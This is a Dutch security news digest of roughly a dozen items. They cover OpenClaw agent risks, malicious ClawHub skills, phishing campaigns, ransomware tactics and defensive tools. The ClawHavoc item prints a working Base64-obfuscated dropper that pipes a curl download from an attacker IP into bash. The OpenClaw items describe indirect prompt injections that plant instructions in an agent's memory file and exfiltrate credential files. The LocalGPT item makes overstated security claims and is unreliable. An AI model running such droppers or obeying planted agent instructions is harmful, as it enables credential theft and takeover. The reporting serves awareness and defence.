De recente populariteit van OpenClaw en Moltbook heeft security zorgen doen rijzen. OpenClaw functioneert als een automation engine om workflows te triggeren, te interageren met online services en te opereren op verschillende apparaten. De toegang die aan skills wordt gegeven, in combinatie met het feit dat ze data van niet-vertrouwde bronnen kunnen verwerken, kan de deur openen naar risico's zoals malware en prompt injection. Integraties verbreden het aanvalsoppervlak en breiden de set van niet-vertrouwde inputs uit die de agent consumeert, waardoor het een "agentic trojan horse" wordt voor data exfiltration en andere kwaadaardige acties. Backslash Security beschreef OpenClaw als een "AI With Hands."

OpenClaw stelt dat AI-agents, in tegenstelling tot traditionele software, natuurlijke taal interpreteren en beslissingen nemen over acties, waardoor de grens tussen gebruikersintentie en machine execution vervaagt. Ze kunnen worden gemanipuleerd via taal zelf. De macht die skills hebben kan worden misbruikt door kwaadwillenden, die de toegang van de agent tot tools en data kunnen gebruiken om gevoelige informatie te exfiltreren, ongeautoriseerde commando's uit te voeren, berichten namens het slachtoffer te verzenden en zelfs extra payloads te downloaden en uit te voeren zonder hun medeweten of toestemming.

Omdat OpenClaw steeds vaker op employee endpoints wordt ingezet zonder formele IT- of security goedkeuring, kunnen de verhoogde privileges van deze agents shell access, data movement en network connectivity buiten standaard security controls mogelijk maken, waardoor een nieuwe klasse van Shadow AI risk voor enterprises ontstaat.

Astrix Security researcher Tomer Yahalom zei dat OpenClaw en tools zoals het in elke organisatie zullen verschijnen, ongeacht of ze worden goedgekeurd of niet. Werknemers zullen ze installeren omdat ze nuttig zijn. De vraag is of men er van op de hoogte is.

Er zijn verschillende security issues geconstateerd, waaronder een nu opgelost probleem in eerdere versies dat ertoe kon leiden dat proxied traffic verkeerd werd geclassificeerd als lokaal, waardoor authenticatie voor sommige internet-exposed instances werd omzeild. OX Security meldde dat OpenClaw credentials in cleartext opslaat, onveilige coding patterns gebruikt (inclusief direct eval met user input), en geen privacy policy of duidelijke accountability heeft. Common uninstall methoden laten gevoelige data achter en het volledig intrekken van toegang is moeilijker dan de meeste gebruikers beseffen.

Een zero-click attack maakt misbruik van OpenClaw's integraties om een backdoor te planten op een endpoint van een slachtoffer voor persistent control wanneer een onschuldig document wordt verwerkt door de AI-agent, wat resulteert in de execution van een indirect prompt injection payload waarmee het kan reageren op berichten van een attacker-controlled Telegram bot. Een indirect prompt injection embedded in een webpagina zorgt ervoor dat OpenClaw een attacker-controlled set van instructies toevoegt aan het ~/.openclaw/workspace/HEARTBEAT.md bestand en stilzwijgend wacht op verdere commando's van een externe server.

Uit een security analysis van 3.984 skills op de ClawHub marketplace is gebleken dat 283 skills (ongeveer 7,1% van het totale aantal) kritieke security flaws bevatten die gevoelige credentials in plaintext blootleggen via het LLM's context window en output logs. Bitdefender meldt dat kwaadaardige skills vaak worden gekloond en opnieuw gepubliceerd op schaal met behulp van kleine name variations, en dat payloads worden staged via paste services zoals glot.io en public GitHub repositories.

Een nu gepatchte one-click remote code execution vulnerability in OpenClaw kon een attacker in staat stellen om een gebruiker te verleiden tot het bezoeken van een kwaadaardige webpagina die de Gateway Control UI ertoe kon aanzetten de OpenClaw authentication token te lekken via een WebSocket channel en deze vervolgens te gebruiken om arbitrary commands uit te voeren op de host. OpenClaw's gateway bindt standaard aan 0.0.0.0:18789, waardoor de volledige API wordt blootgesteld aan elke network interface. Censys data toont aan dat er op 8 februari 2026 meer dan 30.000 exposed instances toegankelijk zijn via het internet, hoewel de meeste een token value vereisen om ze te bekijken en ermee te interageren.

In een hypothetisch attack scenario kan een prompt injection payload embedded in een specifiek vervaardigd WhatsApp bericht worden gebruikt om ".env" en "creds.json" bestanden te exfiltreren, die credentials, API keys en session tokens opslaan voor connected messaging platforms van een exposed OpenClaw instance. Een misconfigured Supabase database van Moltbook die exposed was in client-side JavaScript maakte secret API keys van elke agent die op de site was geregistreerd vrij toegankelijk en stond volledige read en write access tot platform data toe. Volgens Wiz omvatte de exposure 1,5 miljoen API authentication tokens, 35.000 email addresses en private messages tussen agents.

Threat actors exploiteren Moltbook's platform mechanics om het bereik te vergroten en andere agents naar kwaadaardige threads te leiden die prompt injections bevatten om hun gedrag te manipuleren en gevoelige data te extraheren of cryptocurrency te stelen. Zenity Labs stelt dat Moltbook mogelijk onbedoeld ook een laboratorium heeft gecreëerd waarin agents, die high-value targets kunnen zijn, constant niet-vertrouwde data verwerken en ermee interageren, en waarin geen guardrails in het platform zijn ingesteld.

HiddenLayer onderzoekers benadrukken dat OpenClaw vertrouwt op het geconfigureerde language model voor veel security-critical decisions. Tenzij de gebruiker proactief OpenClaw's Docker-based tool sandboxing feature inschakelt, blijft full system-wide access de default. Andere architecturale en design problemen die door het AI security bedrijf zijn geïdentificeerd zijn OpenClaw's falen om niet-vertrouwde content met control sequences uit te filteren, ineffectieve guardrails tegen indirect prompt injections, modifiable memories en system prompts die persisteren in toekomstige chat sessions, plaintext storage van API keys en session tokens, en geen expliciete user approval voor het uitvoeren van tool calls.

Persmiso Security stelt dat de security van het OpenClaw ecosystem veel crucialer is dan app stores en browser extension marketplaces vanwege de agents' uitgebreide toegang tot user data. Security researcher Ian Ahl wijst erop dat AI-agents credentials krijgen tot iemands hele digitale leven. In tegenstelling tot browser extensions die in een sandbox met een zekere mate van isolation draaien, opereren deze agents met de full privileges die men ze geeft. De skills marketplace verergert dit. Wanneer men een kwaadaardige browser extension installeert, compromitteert men één systeem. Wanneer men een kwaadaardige agent skill installeert, compromitteert men potentieel elk systeem waar die agent credentials voor heeft.

De lange lijst van security issues die aan OpenClaw zijn gekoppeld heeft China's Ministry of Industry and Information Technology ertoe aangezet een alert uit te geven over misconfigured instances, waarbij gebruikers worden aangespoord om beschermingsmaatregelen te implementeren om zich te beveiligen tegen cyber attacks en data breaches.

Ensar Seker, CISO bij SOCRadar, vertelde dat wanneer agent platforms viral gaan sneller dan security practices volwassen worden, misconfiguration de primaire attack surface wordt. Het risico is niet de agent zelf; het is het blootstellen van autonomous tooling aan public networks zonder hardened identity, access control en execution boundaries. De Chinese regulator roept expliciet configuration risk aan in plaats van de technologie te verbieden. Agent frameworks versterken zowel de productivity als de blast radius. Een single exposed endpoint of overly permissive plugin kan een AI agent veranderen in een unintentional automation layer voor attackers.

Bron: Cisco

In een tijdperk waarin AI-assistenten zoals ChatGPT en Claude cloud infrastructuren domineren en gebruikersdata blootstellen aan externe inbreuken, belooft LocalGPT, een nieuwe tool gebouwd in Rust, een veiliger alternatief. LocalGPT is ontwikkeld als een enkel binair bestand van ongeveer 27MB en draait volledig op lokale apparaten, waardoor gevoelige data niet in de cloud terechtkomen. De tool is geïnspireerd door en compatibel met het OpenClaw framework, en legt de nadruk op persistent geheugen, autonome operaties en minimale afhankelijkheden.

De basis van LocalGPT is Rust’s memory safety model, dat veelvoorkomende kwetsbaarheden zoals buffer overflows elimineert. Omdat er geen Node.js, Docker of Python nodig is, is het aanvalsoppervlak kleiner en zijn er geen package manager exploits of container escapes.

Alle verwerking vindt plaats op de machine van de gebruiker. Dit lokale ontwerp voorkomt man-in-the-middle aanvallen en data exfiltratie risico's die inherent zijn aan SaaS AI. LocalGPT's persistent geheugen gebruikt Markdown bestanden in `~/.localgpt/workspace/`: `MEMORY.md` voor lange-termijn kennis, `HEARTBEAT.md` voor taakwachtrijen, `SOUL.md` voor persoonlijkheidsrichtlijnen, en een `aknowledge/directory` voor gestructureerde data. Deze worden geïndexeerd via SQLite FTS5 voor full-text search en `sqlite-vec` voor semantic queries met local embeddings van `fastembed`. Er worden geen externe databases of cloud syncs gebruikt.

De autonome "heartbeat" functionaliteit stelt gebruikers in staat om achtergrondtaken te delegeren tijdens configureerbare actieve uren (bijvoorbeeld 09:00–22:00), met een standaardinterval van 30 minuten. Multi-provider support omvat Anthropic (Claude), OpenAI en Ollama, configureerbaar via `~/.localgpt/config.toml` met API keys voor hybride setups. De core operaties blijven echter device-bound.

Installatie is eenvoudig: `cargo install localgpt`. Quick-start commando's zijn onder meer `localgpt config init` voor setup, `localgpt chat` voor interactieve sessies, of `localgpt ask "What is the meaning of life?"` voor eenmalige vragen. Daemon mode (`localgpt daemon start`) start een achtergrondservice met HTTP API endpoints zoals `/api/chat` voor integraties en `/api/memory/search?q=<query>` voor queries.

CLI commando's omvatten daemon management (start/stop/status), memory ops (search/reindex/stats) en config viewing. Een web UI en desktop GUI (via eframe) bieden toegankelijke frontends. Gebouwd met Tokio voor async efficiency, Axum voor de API server en SQLite extensies, is het geoptimaliseerd voor low-resource omgevingen. LocalGPT’s OpenClaw compatibiliteit ondersteunt SOUL, MEMORY, HEARTBEAT bestanden en skills, waardoor modulaire, auditable extensions mogelijk zijn zonder vendor lock-in.

Security researchers beschouwen de SQLite-backed indexing als tamper-resistant, ideaal voor air-gapped forensics of classified ops. In red-team scenario's belemmert het minimalisme reverse-engineering. Vroegtijdige gebruikers in de financiële en juridische sector merken op dat de `knowledge/silos` cross-contamination en lekken voorkomen.

Bron: GitHub

De nieuwe open-source en cross-platform tool Tirith is in staat om homoglyph-aanvallen via command-line omgevingen te detecteren door URL's in getypte commando's te analyseren en hun uitvoering te stoppen. De tool is beschikbaar op GitHub en als een npm package.

Tirith werkt door in te haken op de shell van de gebruiker (zsh, bash, fish, PowerShell) en elk commando dat de gebruiker plakt te inspecteren voordat het wordt uitgevoerd. Het idee is om misleidende aanvallen te blokkeren die gebruik maken van URL's met symbolen uit verschillende alfabetten die identiek of bijna identiek lijken voor de gebruiker, maar door de computer als verschillende karakters worden behandeld (homoglyph-aanvallen). Aanvallers kunnen zo domeinnamen creëren die er hetzelfde uitzien als die van een legitiem merk, maar dan met één of meer karakters uit een ander alfabet. Hoewel browsers dit probleem hebben aangepakt, zijn terminals nog steeds vatbaar omdat ze nog steeds Unicode, ANSI escapes en onzichtbare karakters kunnen weergeven, aldus Sheeki, de auteur van Tirith.

Volgens Sheeki kan Tirith de volgende soorten aanvallen detecteren en blokkeren: homograaf-aanvallen (Unicode lookalike karakters in domeinen, punycode en gemengde scripts), terminal injectie (ANSI escapes, bidi overrides, zero-width chars), pipe-to-shell patronen (curl | bash, wget | sh, eval $(…)), dotfile hijacking (~/.bashrc, ~/.ssh/authorized_keys, etc.), onveilige transport (HTTP naar shell, TLS uitgeschakeld), supply-chain risico's (typosquatted git repos, untrusted Docker registries), en credential exposure (userinfo URLs, shorteners hiding destinations).

Unicode homoglyph karakters zijn in het verleden gebruikt in URL's die via e-mail werden verspreid en naar een kwaadaardige website leidden, zoals een phishing campagne vorig jaar die zich voordeed als Booking.com. Verborgen karakters in commando's komen vaak voor in ClickFix aanvallen die door een breed scala aan cybercriminelen worden gebruikt. Tirith zou een zekere mate van bescherming kunnen bieden tegen deze aanvallen op ondersteunde PowerShell sessies. Het is belangrijk op te merken dat Tirith niet inhaakt op Windows Command Prompt (cmd.exe), wat wordt gebruikt in veel ClickFix aanvallen die gebruikers instrueren om kwaadaardige commando's uit te voeren.

Volgens Sheeki is de overhead van het gebruik van Tirith sub-milliseconde, waardoor de controles direct worden uitgevoerd en de tool onmiddellijk wordt afgesloten wanneer deze klaar is. De tool kan ook commando's analyseren zonder ze uit te voeren, de trust signals van een URL opsplitsen, byte-level Unicode inspectie uitvoeren en receipts auditen met SHA-256 voor uitgevoerde scripts. De maker verzekert dat Tirith alle analyse acties lokaal uitvoert, zonder netwerkoproepen te doen, de geplakte commando's van de gebruiker niet wijzigt en niet op de achtergrond draait. Ook vereist het geen cloud toegang of netwerk, accounts of API keys, en verzendt het geen telemetrie data naar de maker.

Tirith werkt op Windows, Linux en macOS, en kan worden geïnstalleerd via Homebrew, apt/dnf, npm, Cargo, Nix, Scoop, Chocolatey en Docker.

Bron: GitHub

Een geavanceerde Telegram phishing campagne is weer opgedoken, waarbij de aanvallers de legitieme authenticatie-infrastructuur van het platform misbruiken om gebruikersaccounts te compromitteren. In tegenstelling tot traditionele methoden waarbij inlogpagina's worden gekloond om wachtwoorden te stelen, maakt deze aanval direct gebruik van de officiële login workflows van Telegram. Hierdoor kunnen de aanvallers beveiligingsfilters omzeilen en geautoriseerde gebruikerssessies verkrijgen zonder direct alarm te slaan.

De aanvalsmethoden zijn ontworpen om argwaan bij gebruikers te minimaliseren door routine beveiligingscontroles en verificatieprocedures na te bootsen. Slachtoffers krijgen valse login interfaces te zien die zowel QR-code scanning als handmatige telefoonnummerinvoer ondersteunen. Deze interfaces worden gehost op tijdelijke domeinen die sterk lijken op de branding van Telegram. Wanneer een gebruiker hiermee interageert, sturen ze geen gegevens naar een database van een hacker, maar activeren ze onbedoeld een echt login verzoek dat is geïnitieerd door het apparaat van de aanvaller.

Analisten van Cyfirma identificeerden deze malware na de unieke mogelijkheid te hebben waargenomen om autorisatieprompts te framen als beveiligingsverificaties. Deze methode verhoogt de compliance van het slachtoffer aanzienlijk en vermindert detecteerbare anomalieën. Zodra de gebruiker het verzoek op zijn mobiele apparaat goedkeurt, in de veronderstelling dat hij zijn identiteit verifieert, krijgen de aanvallers onmiddellijk toegang tot het account. Dit stelt hen in staat om communicatie te monitoren en secundaire aanvallen te lanceren tegen de contacten van het slachtoffer, zonder de gebruiker te waarschuwen via verdachte login waarschuwingen of exploit-gebaseerde toegang.

Het technische vernuft van deze campagne blijkt uit het gebruik van dynamische backend configuraties om detectie te ontwijken. In plaats van phishing logica hard te coderen in de frontend HTML, haalt de site runtime instructies op van een gecentraliseerde server via cross-origin API requests. Deze JSON response levert door de aanvaller gecontroleerde Telegram API credentials, zoals de api_id en api_hash, samen met gelokaliseerde taalgegevens om de login interface weer te geven. Dit configuratie-gedreven ontwerp stelt de operators in staat om snel domeinen te roteren met behoud van consistente authenticatie logica.

De phishing pagina's tonen ook misleidende systeem berichten, waarin gebruikers worden geïnstrueerd om op "Ja" te klikken in de in-app notificatie om hun account te "verifiëren". Door de beslissende actie te verplaatsen naar de vertrouwde Telegram app interface, maskeert de campagne het kwaadaardige karakter van het sessie binding proces. Om deze risico's te beperken, moeten gebruikers uiterst voorzichtig zijn met in-app autorisatieprompts. Keur nooit een login verzoek goed tenzij u dit persoonlijk hebt geïnitieerd, zelfs niet als de prompt beweert een beveiligingscontrole of ongebruikelijke activiteit te zijn. Vermijd het scannen van QR-codes van onbekende websites en controleer regelmatig actieve sessies in de "Apparaten" instellingen van Telegram. Het inschakelen van Two-Step Verification voegt een extra beveiligingslaag toe, waardoor ongeautoriseerde sessie creatie wordt voorkomen door een secundair wachtwoord te vereisen, zelfs als een gebruiker wordt misleid om de initiële prompt goed te keuren.

Bron: Cyfirma

Security researcher 0xflux heeft een proof-of-concept (POC) Windows minifilter driver ontwikkeld voor real-time ransomware detectie. De driver onderschept bestandssysteemgebeurtenissen om verdacht gedrag te signaleren, zoals snelle bestandsschrijfbewerkingen en het hernoemen van bestanden naar bekende kwaadaardige extensies.

De minifilter driver maakt gebruik van de Filter Manager, een kernel-mode component die een API biedt voor minifilter drivers. Dit elimineert de noodzaak om legacy filter drivers te bouwen. Minifilter drivers registreren hun I/O operation callbacks bij de Filter Manager, die ze aanroept in volgorde van hoogte, waardoor deterministische layering wordt gegarandeerd wanneer meerdere filters geladen zijn.

Een minifilter begint als een kernel driver, met een DriverEntry functie. In plaats van de typische driver setup, gebruikt het de Flt functie familie (FltRegisterFilter, FltStartFiltering) om zichzelf te registreren en callback functies te declareren voor specifieke I/O request packets (IRPs).

PostOperationSetInformation behandelt hernoemingen, filtert op FileRenameInformation classes en haalt genormaliseerde bestandsnamen op via FltGetFileNameInformation en FltParseFileNameInformation. Vervolgens scant het extensies tegen een lijst, zoals L”.HLJkNskOq” van LockBit IOCs. Een overeenkomst activeert alerts naar een user-mode engine voor verdere controles, zoals bestand entropy analyse. Procesdetails, inclusief PID via PsGetProcessId en image name via SeLocateProcessImageName, worden gelogd voor correlatie.

Voor schrijfbewerkingen filtert PostOperationCreate access masks zoals FILE_WRITE_DATA of FILE_APPEND_DATA. Dit signaleert processen die mutable file access zoeken, wat kan duiden op potentiële encryptie voorbereiding. Pre-operation callbacks retourneren FLT_PREOP_SUCCESS_WITH_CALLBACK om post-handling mogelijk te maken zonder te blokkeren.

De C-based driver, gehost op GitHub onder Sanctum/fs_minifilter, bevat veiligheidscontroles voor productie gebruik. Een Rust simulator simuleert ransomware: opent test.txt, schrijft junk bytes en hernoemt het naar test.HLJkNskOq. Wanneer geladen, detecteert en logt de driver deze gebeurtenissen, wat de effectiviteit tegen LockBit-achtig gedrag aantoont.

Naast extensies, trackt de aanpak event volume: één proces dat meerdere directories raakt, signaleert een uitbraak. Inspectie van bestandstype correlaties en entropy verbetert de nauwkeurigheid. Toekomstige verbeteringen omvatten user-mode collectors voor proces trees, partiële bestand reads en rate-limiting detecties (bijvoorbeeld, high-entropy veranderingen per seconde). Het bevriezen van verdachte threads zou response tijd kunnen kopen.

Deze POC van Flux sluit aan bij trends in behavioral EDR en presteert beter dan signature-based AV tegen fileless of polymorphic threats.

Bron: Google

De Black Basta ransomwaregroep heeft een nieuwe tactiek geïntroduceerd waarbij een "Bring Your Own Vulnerable Driver" (BYOVD) component direct in de ransomware payload is geïntegreerd. Deze integratie wijkt af van de gebruikelijke werkwijze, waarbij tools voor het omzeilen van detectie als afzonderlijke bestanden worden ingezet vóór de encryptiefase. Het doel is om security software op de machine van het slachtoffer uit te schakelen.

Door gebruik te maken van een legitieme, ondertekende driver met kwetsbaarheden, kunnen aanvallers code uitvoeren met kernel-level privileges. Deze toegang stelt hen in staat om antivirus- en endpointdetectieprocessen te beëindigen die de ransomware anders zouden blokkeren. Deze methode stroomlijnt de aanvalsketen, waardoor het sneller en moeilijker wordt voor verdedigers om de aanval te onderscheppen voordat schade ontstaat.

Analisten van Symantec identificeerden deze nieuwe mogelijkheid tijdens een onderzoek naar de Cardinal cybercrime groep. Dit is opmerkelijk omdat het suggereert dat Cardinal weer actief is, na een periode van relatieve stilte nadat hun interne chatlogs begin 2025 waren gelekt. De onderzoekers merkten op dat het bundelen van ontwijkingscomponenten op zich niet nieuw is, maar deze specifieke implementatie nog niet eerder is waargenomen in Black Basta campagnes.

De integratie van de kwetsbare driver dient als een robuust schild tegen detectie. Zodra de payload wordt uitgevoerd, probeert deze onmiddellijk de verdediging te neutraliseren, waardoor het systeem wordt blootgesteld aan encryptie. Dit duidt op een hoger niveau van verfijning en een potentiële trend die andere ransomware families zouden kunnen overnemen om moderne security protocollen te omzeilen.

De kern van dit mechanisme berust op het misbruik van een specifieke kwetsbare Windows kernel-mode driver, genaamd NsecSoft NSecKrnl. Na de uitvoering laat de ransomware payload deze driver vallen en creëert een service om de werking ervan te faciliteren. De driver heeft een kritieke kwetsbaarheid, geregistreerd als CVE-2025-68947, die er niet in slaagt om gebruikersrechten adequaat te verifiëren. Hierdoor kunnen de aanvallers kwaadaardige Input/Output Control requests versturen om beschermde processen te beëindigen.

De malware richt zich specifiek op een uitgebreide lijst van security agents, waaronder SophosHealth.exe, MsMpEng.exe en diverse andere detectietools. Door de monitors van het systeem effectief te verblinden, voegt de ransomware de .locked extensie toe aan bestanden zonder onderbreking. Daarnaast werd weken eerder een verdachte side-loaded loader waargenomen op netwerken, wat wijst op een potentieel lange verblijftijd. Organisaties wordt aangeraden het meest recente Symantec Protection Bulletin te raadplegen voor bijgewerkte indicators of compromise.

Bron: Symantec

Het open-source AI agent platform OpenClaw is het doelwit geworden van supply chain aanvallen. Beveiligingsbedrijven SlowMist en Koi Security hebben honderden compromised extensies ontdekt in de ClawHub plugin marketplace. Deze extensies verspreiden infostealers zoals Atomic Stealer.

OpenClaw maakt het mogelijk om workflows te automatiseren, te interageren met services en apparaten te controleren via modulaire extensies, genaamd "skills", die gehost worden op ClawHub. Deze skills volgen de AgentSkills specificatie en bestaan voornamelijk uit SKILL.md folders die executable instructies bevatten in plaats van controleerbare code. Dit ontwerp maakt het platform vatbaar voor misbruik.

Het uploadproces van ClawHub ontbeert strenge controles, waardoor het vergelijkbaar is met kwetsbaarheden in npm of VS Code marketplaces. De populariteit van het platform is recentelijk toegenomen, wat zowel ontwikkelaars als aanvallers aantrekt.

Koi Security heeft 2.857 ClawHub skills gescand en identificeerde 341 kwaadaardige skills, wat neerkomt op een infectiepercentage van 12%. Deze campagne staat bekend als ClawHavoc. SlowMist consolideerde IOC's van meer dan 400 samples en vond 472 getroffen skills met gedeelde infrastructuur.

De kwaadaardige skills richten zich op crypto tools (Solana trackers, Phantom wallets), YouTube utilities, Polymarket bots en typosquats zoals "clawhub1". Ze doen zich voor als updaters, security checks of financiële hulpmiddelen om detectie te vermijden.

Aanvallers embedden twee-staps payloads in de SKILL.md "prerequisites". Gebruikers decoderen Base64-obfuscated commando's zoals echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash, wat een curl | bash download triggert.

De eerste-stap droppers halen scripts op van IP-adressen zoals 91.92.242.30 en downloaden vervolgens tweede-stap binaries (zoals x5ki60w1ih838sp7). Dit zijn ad-hoc signed Mach-O universals die overeenkomen met Atomic macOS Stealer (AMOS). AMOS kopieert data van Desktop/Documents, exfiltreert deze naar C2 servers zoals socifiapp.com en steelt Keychain/browser credentials, volgens SlowMist analyse.

Dynamische analyse toont phishing dialogen voor wachtwoorden, ZIP archivering van .txt/.pdf bestanden en uploads via curl. Hergebruik van domeinen/IP-adressen (zoals 91.92.242.30, gelinkt aan de Poseidon extortion group) wijst op georganiseerde operaties.

Een populaire "X (Twitter) Trends" skill verbergt Base64 backdoors die config output nabootsen. Decodering leidt tot downloads van 91.92.242.30/q0c7ew2ro8l2cfqp, wat een stealer triggert die macOS folders target. Dit omzeilt keyword scanners en maakt snelle payload swaps mogelijk.

Bron: Google

Een geavanceerde supply chain-aanval richt zich op IT-beheerders en Open Source Intelligence (OSINT) professionals. Deze campagne maakt gebruik van het ontwikkelplatform GitHub om een verborgen backdoor te verspreiden. In tegenstelling tot typische opportunistische aanvallen, toont deze operatie een hoog niveau van planning. Inactieve accounts worden gebruikt om argwaan te vermijden en kwaadaardige payloads rechtstreeks aan technische gebruikers te leveren.

De aanvallers reactiveren GitHub-accounts die jarenlang inactief zijn geweest, waarschijnlijk om hun bestaande reputatie te benutten. Deze accounts beginnen plotseling met het publiceren van gepolijste, AI-gegenereerde softwareprojecten. Deze repositories doen zich vaak voor als nuttige tools, zoals cryptocurrency bots, GPT wrappers en andere beveiligingsgerelateerde hulpprogramma's. Het gebruik van AI-gegenereerde content stelt de aanvallers in staat om deze repositories snel te vullen met legitiem uitziende code, waardoor ze actief en onderhouden lijken.

Analisten van Morphisec identificeerden deze campagne nadat ze hadden vastgesteld dat verschillende van deze repositories in de trending lijsten van GitHub waren geklommen. Deze zichtbaarheid plaatste de kwaadaardige tools direct voor de beoogde doelgroep. Zodra de repositories aan populariteit en vertrouwen wonnen binnen de community, introduceerden de aanvallers subtiele "onderhouds" commits. Deze updates bevatten een voorheen niet-gedocumenteerde JavaScript- en HTA-backdoor, die de onderzoekers "PyStoreRAT" hebben genoemd.

Deze malware is ontworpen voor lange termijn persistentie en datadiefstal. Eenmaal geïnstalleerd, dient het als een multifunctionele loader die in staat is om het systeem van het slachtoffer te profileren en verdere payloads te implementeren. Een van de primaire payloads die is waargenomen, is de Rhadamanthys stealer, een tool die wordt gebruikt om gevoelige informatie te exfiltreren. De malware heeft ook de mogelijkheid om zich te verspreiden via verwisselbare schijven, waardoor het potentiële bereik binnen het netwerk van een organisatie toeneemt.

Een belangrijk kenmerk van PyStoreRAT is het vermogen om zijn gedrag aan te passen op basis van de beveiligingsomgeving die hij tegenkomt. De malware voert uitgebreide controles uit om de aanwezigheid van specifieke antivirusproducten te detecteren, zoals CrowdStrike Falcon en ReasonLabs. Als deze verdedigingen worden gedetecteerd, verandert PyStoreRAT zijn uitvoeringstechniek en schakelt over naar alternatieve lanceerpaden om te voorkomen dat alarmen worden geactiveerd.

Bovendien is de command-and-control (C2) infrastructuur die deze campagne ondersteunt gebouwd voor veerkracht. Het maakt gebruik van een roterende set nodes die naadloze updates van de payload van de malware mogelijk maakt. Deze circulaire structuur maakt het moeilijk voor verdedigers om de operatie uit te schakelen, omdat de infrastructuur snel naar nieuwe nodes kan overschakelen. De codebase bevat ook taalkundige artefacten, zoals Russische strings, wat duidt op een specifieke geografische oorsprong of targeting scope. Experts raden aan om gedragsgebaseerde verdedigingsstrategieën te gebruiken die niet uitsluitend afhankelijk zijn van statische signatures om deze evoluerende dreigingen te detecteren.

Bron: Morphisec

Een geraffineerde phishing campagne richt zich op Apple Pay gebruikers door middel van misleidende e-mails en telefoongesprekken om gevoelige financiële informatie te stelen. De aanval begint doorgaans met een e-mail die er vertrouwd uitziet, compleet met het officiële Apple logo en een professionele lay-out. De onderwerpregel is ontworpen om onmiddellijk paniek te zaaien en waarschuwt de ontvanger voor een transactie met een hoog bedrag die zogenaamd is gestopt in een Apple Store om financieel verlies te voorkomen.

Het bericht bevat realistische details, zoals een specifieke case ID, een tijdstempel en een waarschuwing dat het account risico loopt. In veel gevallen beweert de e-mail dat er een "afspraak" is gemaakt voor de gebruiker om de frauduleuze activiteit te bekijken. Er wordt een telefoonnummer verstrekt voor onmiddellijke hulp, waarbij slachtoffers worden aangespoord te bellen als het tijdstip ongelegen is. De opmaak lijkt op legitieme ontvangstbewijzen, waardoor alle juiste angstknoppen worden ingedrukt om het wantrouwen van de gebruiker te omzeilen.

Analisten van Malwarebytes hebben deze campagne geïdentificeerd en merken op dat deze afhankelijk is van "vishing" (voice phishing) in plaats van kwaadaardige links. Door slachtoffers in een telefoongesprek te lokken, kunnen aanvallers hen effectiever manipuleren. Het uiteindelijke doel is om inlogcodes en betaalgegevens te stelen, waarbij gebruik wordt gemaakt van het vertrouwen dat gebruikers in het merk Apple hebben om beveiligingsmaatregelen te omzeilen en de controle over te nemen.

Als de aanval succesvol is, krijgen aanvallers volledige toegang tot het Apple account van het slachtoffer, inclusief opgeslagen foto's, gegevens en gekoppelde creditcards. De overtuigende aard van de valse facturen, zoals een ontvangstbewijs voor een 2025 MacBook Air, maakt het een serieuze bedreiging voor consumenten.

Wanneer een slachtoffer het opgegeven telefoonnummer belt, stelt een agent zich voor als onderdeel van de fraudedienst van Apple. Het gesprek is zorgvuldig gescript om vertrouwen op te bouwen, beginnend met onschuldige controles zoals de laatste vier cijfers van een telefoonnummer. De agent legt uit dat het systeem een transactie "gedeeltelijk heeft geblokkeerd" en verificatie nodig heeft om het account volledig te beveiligen.

Dit is het cruciale punt: de oplichter vraagt om de Apple ID two-factor authenticatiecode. Zonder dat het slachtoffer het weet, logt de crimineel in real-time in op het account. De agent kan zelfs beweren dat criminelen zich momenteel in een fysieke winkel bevinden en proberen de kaart te gebruiken, waardoor de druk wordt opgevoerd.

Om veilig te blijven, moeten gebruikers onthouden dat Apple geen frauduleuze afspraken via e-mail inplant of terugbelverzoeken eist. Controleer altijd het adres van de afzender, aangezien deze e-mails niet afkomstig zijn van officiële Apple domeinen. Deel nooit two-factor authenticatiecodes of wachtwoorden met iemand, zelfs niet als diegene beweert een supportmedewerker te zijn. Als je een probleem vermoedt, wijzig dan onmiddellijk je Apple ID wachtwoord, meld je af bij alle actieve sessies en controleer de komende weken je bankafschriften op onregelmatige activiteiten.

Bron: Malwarebytes

Cybercriminelen maken steeds vaker gebruik van "living off the cloud" strategieën om beveiligingssystemen te omzeilen. Door de infrastructuur van vertrouwde serviceproviders te misbruiken, kunnen aanvallers hun activiteiten verbergen, waardoor detectie moeilijker wordt. Een recente campagne maakt gebruik van gratis Firebase developer accounts om phishing aanvallen uit te voeren.

Firebase, een platform voor de ontwikkeling van mobiele en webapplicaties, biedt een gratis variant waarmee gebruikers content kunnen hosten en applicaties kunnen implementeren. Hackers maken hier misbruik van door overtuigende phishing pagina's te hosten die de inlogportals van populaire merken nabootsen.

Unit 42 analisten identificeerden deze activiteit begin februari 2026 en zagen een toename van phishing campagnes die gebruik maken van deze misbruikte developer accounts. De aanvallers gebruiken tactieken om slachtoffers onder druk te zetten. Voorbeelden hiervan zijn urgente meldingen over frauduleus accountgebruik of aanbiedingen van gratis, waardevolle items.

Het succes van deze campagnes is te danken aan het vertrouwen dat gebruikers en beveiligingssystemen hebben in het hosting domein. Omdat de phishing links zich bevinden op geldige subdomeinen van firebaseapp.com of web.app, omzeilen ze vaak e-mail beveiligings gateways die Google-gerelateerde infrastructuur whitelisten. Deze hoge delivery rate, in combinatie met de visuele authenticiteit van de gehoste pagina's, leidt tot een toename van credential diefstal.

Een kenmerk van deze operatie is het gebruik van "reputation hijacking" om detectie te omzeilen. Traditionele beveiligingsfilters analyseren de leeftijd en reputatie van een domein om de legitimiteit te verifiëren. Door phishing content op Firebase te hosten, erven aanvallers de positieve reputatie van het door Google gehoste domein. De gratis aard van deze accounts maakt snelle verspreiding mogelijk. Als een specifiek project wordt gemarkeerd en opgeschort, kunnen de aanvallers direct een nieuwe instantie met een andere naam aanmaken.

Organisaties wordt aangeraden de inspectie van URL bestemmingen te verbeteren, inclusief die gehost op bekende cloud provider domeinen. Security teams wordt aangeraden om te controleren op ongebruikelijke verkeerspatronen naar generieke cloud subdomeinen en medewerkers voorlichting te geven over het verifiëren van het volledige URL pad voordat ze credentials of gevoelige data invoeren.

Bron: Unit 42

Een aanbieder van initiële toegang, een zogeheten initial access broker, biedt momenteel volledige controle aan over de systemen van twee afzonderlijke doelwitten. De toegang tot deze doelwitten wordt voor een bedrag van 300 dollar per stuk te koop aangeboden. Het eerste doelwit betreft een private Europese aanbieder van bestandshosting en het tweede doelwit is een privaat platform voor AI-communicatie-infrastructuur voor zakelijk gebruik.

